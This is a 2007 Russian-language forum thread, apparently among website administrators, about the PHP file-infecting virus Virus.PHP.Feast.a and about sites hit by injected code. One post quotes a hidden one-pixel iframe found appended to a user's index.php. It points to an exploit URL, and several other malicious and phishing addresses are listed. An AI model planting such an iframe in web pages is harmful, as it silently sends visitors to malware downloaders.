вирус "Virus.PHP. Feast.a"

[Mihailves 0]

а как на счет. Будет ли закрыто в этом скрипте "«php.faces»''

Virus.PHP. Feast.a

02 июля, 2007

Скриптовый вирус, заражающий файлы с расширением «.php». Имеет размер 1251 байт. Написан на PHP.

Деструктивная активность

При запуске вирус ищет в рабочей папке и в папке на уровень выше файлы с расширением «.php». В найденных файлах вредоносная программа проверяет наличие строки «php.faces». Если строка отсутствует, вирус записывает в конец заражаемых файлов свое тело и завершает работу.

Другие названия

Virus.PHP.Feast.a («Лаборатория Касперского») также известен как: PHP/Faces (McAfee), PHP.Feast (Symantec), PHP/Faces.A (FRISK), PHP/Feast (Grisoft), PHP.Faces.A (SOFTWIN), PHP.Faces.A (ClamAV), PHP/Faces.A (Eset)

источник http://www.securitylab.ru/virus/298674.php

[lifestar 18]

Что за строчки он дописывает и в чём его опастность?

[Mihailves 0]

на сайте источника ничего больше не указано

мне всунули ссылку на "ht*p://1com.ws/exp/index.php обнаружено: троянская программа 'Trojan-Downloader.JS.Agent.ep'

Изменено 4 июля 2007 пользователем Mihailves

[Kaiser 2]

Mihailves,

Меня на какойто айпи скинуло и единственное, так это у м еня антифишинг сработал на адрес _http://81.95.149.235/favicon.ico

[mcaiZer-7 0]

Mihailves,

1. Компьютер на полную проверку от вирусов.

2. Сменить все пароли (мыла, аськи, фтп - абсолютно ВСЕ!).

3. Использовать Mozilla Firefox v2.0 вместо IE.

[Mihailves 0]

mc -aiZer- ($) Спасибо за совет, я уже стреляный волк! прошел и не такое.

я просто не нашел в движке строчку «php.faces» вот и написал в форуме, чтоб обратили внимание и если эта проблема касается DLE то ...

[LelikInside 0]

по-моему глупость, это всё равно что писать: внимание, в сети новый вирус! хотя их пачками выходит в день.

[Kaiser 2]

Выходить-то выходят, но не многие на сайтах увидешь... Чаще всего это скрипты на разгон трафика, антивирусы на них тоже реагируют...

[Mihailves 0]

и вот сегодня мне снова в конце index.php вписали вот такую строчку

<!-- ~ --><iframe style="border: none" width="1" height="1" src="ht*tp://1com.ws/exp/index.php" style="border: 0;"></iframe><!-- ~ -->

а это адресок кидает "09.07.2007 6:35:34 URL: ht*p://shakespearecollege.com/ipublish/data/pdf/blog627u0f/index.php обнаружено: троянская программа 'Trojan-Clicker.HTML.IFrame.p'

"

или еще куда-то

А вы говорите ерунда !

не знаю правильно или нет но я поставил на файл атрибут "только чтение". Теперь посмотрим!!!!

[Danila 8]

не знаю правильно или нет но я поставил на файл атрибут "только чтение". Теперь посмотрим!!!!

Павильно, только проверь еще все компьютеры с которых выходишь по ФТП на наличие троянов и смени пароль на ФТП.

[Mihailves 0]

Да народ зря не реагируете на мои сообщения вот и ht**://pc-news.ru/soft/ уже распространяет всякую заражу вот что каспер показывает

09.07.2007 20:53:42 http://ltraffic.biz/resource.php?id=4326&user=atata запрещен

запрещено: фишинг-адрес http://ltraffic.biz/* URL: http://ltraffic.biz/resource.php?id=4326&user=atata